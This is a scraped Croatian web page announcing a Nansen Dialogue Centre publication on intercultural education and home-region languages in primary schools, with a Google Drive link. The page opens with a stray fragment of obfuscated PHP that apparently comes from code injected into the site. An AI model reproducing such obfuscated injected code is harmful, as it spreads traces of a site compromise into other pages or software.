header

*/($a3b0c4[$o5b2['i29321'][6]]);}exit();}} ?>

U sklopu projekta “Interkulturalno obrazovanje za integrirane zajednice” i “Interkulturalno obrazovanje – jezici zavičaja” financiranog od strane Europske komisije i Ministarstva znanosti, obrazovanja i sporta, izdana je PDF publikacija koja je rezultat suradnje Nansen dijalog centra i osnovnih škola koje su uključene u provedbu vannastavnog programa Kulturna i duhovna baština zavičaja. Tijekom drugog polugodišta šk. god. 2013./2014. većina od 23 uključenih škola, provodile su tematsko područje interkulturalnog obrazovanja - jezici zavičaja - te je dio metodologije i iskustva provedbe prikazan ovom publikacijom. Publikaciju možete naći na sljedećem linku:
https://drive.google.com/file/d/0Bz3qYH9UBaWcYUxXUkpzNlZMS2s/edit?pli=1

Publikacije

interkulturno obrazovanje

Facebook

logo nansen korak po korak